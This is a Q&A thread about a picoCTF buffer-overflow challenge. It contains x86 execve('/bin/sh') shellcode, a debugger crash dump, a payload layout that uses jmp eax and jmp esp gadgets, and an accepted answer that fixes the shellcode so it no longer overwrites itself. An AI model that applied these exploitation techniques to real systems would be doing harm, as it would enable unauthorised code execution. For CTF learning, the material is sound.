# ROP - The use of the jmp esp

Tags: assembly, x86, buffer-overflow, calling-convention, shellcode

I was playing some picoCTF challenges today and I found myself stuck in a challenge.
Digging around the internet, I found a solution online which I cannot fully grasp.

The challenge (whose name I won't spoil for those who are playing picoCTF) revolves around a vulnerable x86 ELF, and it involves using ROP gadgets to gain a shell, however the `checksec` reveals that the binary is not PIE, and there is no NX enabled.

By breaking at `ret` of the vulnerable function, I noticed that the `EAX` register contains the start address of the buffer on the stack. Moreover, I found out that the offset between the start of the buffer and the saved EIP is 28 bytes.

So my first guess was to craft a sufficiently short shellcode, place it inside the buffer preceeded by a NOP sled, and overwrite the `saved EIP` with a gadget jumping to the content of the `EAX` register, aka the start of my buffer.

However, I found out that this approach is not working.
The shellcode I crafted is:

```
int 0x3   ; used for debugging purposes
xor eax, eax
push eax
push 0x0068732f
push 0x6e69622f
xor ebx, ebx
push eax
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
```

I assembled it using pwntool's `asm` library, setting the architecture to `i386`.
The debugger reveals the following after few steps in:

```
pwndbg> 

Program received signal SIGSEGV, Segmentation fault.
0xff854a01 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────
 EAX  0x0
 EBX  0x0
 ECX  0x80e5300 (_IO_2_1_stdin_) ◂— 0xfbad2088
 EDX  0xff854a10 —▸ 0x80e5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x0
 EDI  0x80e5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x0
 ESI  0x80e5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x0
 EBP  0x90909090
 ESP  0xff854a00 ◂— 0x0
 EIP  0xff854a01 ◂— 0x2f000000
─────────────────────────────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────
   0xff8549f3    push   eax
   0xff8549f4    push   0x68732f
   0xff8549f9    push   0x6e69622f
   0xff8549fe    xor    ebx, ebx
   0xff854a00    add    byte ptr [eax], al
    ↓
 ► 0xff854a01    add    byte ptr [eax], al
   0xff854a03    add    byte ptr [edi], ch
   0xff854a05    bound  ebp, qword ptr [ecx + 0x6e]
   0xff854a08    das    
   0xff854a09    jae    0xff854a73                    <0xff854a73>
    ↓
   0xff854a73    add    byte ptr [eax], al
─────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp eip-1 0xff854a00 ◂— 0x0
01:0004│           0xff854a04 ◂— '/bin/sh'
02:0008│           0xff854a08 ◂— 0x68732f /* '/sh' */
03:000c│           0xff854a0c ◂— 0x0
04:0010│ edx       0xff854a10 —▸ 0x80e5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x0
... ↓              2 skipped
07:001c│           0xff854a1c ◂— 0x3e8
───────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────────
 ► f 0 0xff854a01
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
```

Meaning that the execution is breaking at `0xff854a00`.

Now the solution I found online involved crafting the overflow string in the following way:

1. Write 6 NOPs.
2. Place the assembled instruction for `jmp esp`
3. Write 20 more NOPs.
4. Place the `jmp eax` gadget to jump to the start of the buffer, overwriting the saved EIP.
5. Append the shellcode.

From what I've understood, the `jmp ESP` instruction allows to direct the execution right after the `ret` instruction, thus jumping inside the shellcode, but I would like to know more about this.

I even tried recalling the *x86 Call/Return Protocol*, but it seems that I cannot fully grasp how jumping to the stack would actually resolve the challenge.

I seek your help.
Thanks!

Comment: We can't tell how it resolves the challenge. Do you have a specific question? As for your original problem, something overwrites part of your code. Since apparently it's on the stack under the stack pointer, likely your own `push` instructions. Notice that `bound  ebp, qword ptr [ecx + 0x6e]` has machine code `62 69 6E` which corresponds to `push   0x6e69622f`. Adjusting `esp` downwards by a suitable amount should fix the problem.

Comment: Hi @Jester , thank you for your response! I'm sorry if I did not make myself clear in the first place. My question is regarding how the instruction `jmp esp`, when placed inside the buffer overflow string, will jump inside the shell code, even when this latter is placed after the overwritten `sEIP`

Comment: In a pure ROP attack, the buffer overflow payload isn't executed, it's only data (return addresses and other things that might get popped into registers).  If you can do code-injection (onto an executable stack), that's much easier / more powerful, but you might still need to find a gadget somewhere that jumps somewhere relative to ESP if the stack itself is randomized but `.text` isn't.

Comment: The `jmp esp` jumps to the shellcode which in this case is **above** the stack pointer so not corrupted by pushes and such.

Answer (score 4, accepted):

Your code is on the stack under the stack pointer. Part of it is overwritten by your own `push` instructions. Notice that `bound ebp, qword ptr [ecx + 0x6e]` has machine code `62 69 6E` which corresponds to `push 0x6e69622f`. Adjusting `esp` downwards by a suitable amount should fix the problem, e.g. `sub esp, 32`

The other solution works around the problem by putting most of the shellcode above the stack pointer and only using a single `jmp esp` to transfer control. Here is an illustration of the memory layout:

```
|    ...      |           |     ^       |
|    ...      |           |     |       |
|    ...      |           |     |       |
|    ...      | <= ESP => |  shellcode  |
+-------------+           +-------------+
|  ret addr   |  jmp eax  |  ret addr   |
+-------------+           +-------------+
| pushed data |           | pushed data |
|     |       |           |     |       |
|     |       |           |     |       |
|     v       |           |     v       |
|  !overlap!  |           |    ...      |
|     ^       |           |   jmp esp   |
|     |       |           |    nop      |
|     |       |           |    nop      |
|  shellcode  | <= EAX => |    nop      |
+-------------+           +-------------+
```

The initial `nop`s are probably not needed, it should work fine with the `jmp esp` followed by 26 `nop`s (or whatever padding since it's not going to be executed) instead.